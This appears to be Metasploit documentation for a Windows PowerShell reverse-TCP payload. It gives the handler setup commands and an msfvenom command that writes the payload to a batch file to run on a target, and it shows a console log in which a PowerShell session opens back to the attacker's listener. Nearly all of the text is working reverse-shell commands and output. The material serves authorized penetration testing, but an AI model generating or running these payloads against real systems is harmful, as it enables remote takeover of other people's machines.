Tim W
1.3 KiB
1.3 KiB
Vulnerable Application
This powershell payload is suitable for the following environments:
- Windows 7
- Windows Server 2012
- Windows 10
Verification Steps
- Do:
use exploit/multi/handler - Do:
set payload cmd/windows/powershell_reverse_tcp - Do:
set LHOST [IP] - Do:
set LPORT [PORT] - Do:
run
Scenarios
Generating a batch file with msfvenom
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat
The output batch file can be executed directly on the target, or pasted as a command.
Example usage on Windows 7 target
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000
User @ USER-PC
PS C:\Users\User> exit
[*] 192.168.0.2 - Powershell session session 1 closed.
Options
LOAD_MODULES
A list of powershell modules (separated by a commas) to download.